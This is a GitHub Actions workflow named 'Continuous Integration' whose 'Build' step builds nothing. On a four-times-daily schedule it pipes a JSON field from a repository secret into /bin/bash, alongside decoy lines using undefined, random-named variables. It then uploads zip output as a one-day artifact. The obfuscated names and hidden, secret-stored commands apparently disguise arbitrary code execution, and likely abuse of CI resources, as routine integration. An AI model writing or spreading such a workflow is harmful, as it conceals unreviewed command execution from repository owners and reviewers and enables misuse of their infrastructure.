name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '14 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  operation:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        env:
          uq1: ${{ secrets.uq1 }}
        run: |
          printf '%s' "$uq1" | jq -r .wkvyx49857 | /bin/bash
          printf '%s' "$hpmbi50" | jq -r .buti5 | /bin/bash
          echo $se0113 | jq -r .hrkdw70 | /bin/bash
          printf '%s' "$rajvs6662" | jq -r .spfqx70174 | /bin/bash

      - name: Archive output
        uses: actions/upload-artifact@v4
        with:
          name: ZdyADNI
          path: "*.zip"
          retention-days: 1
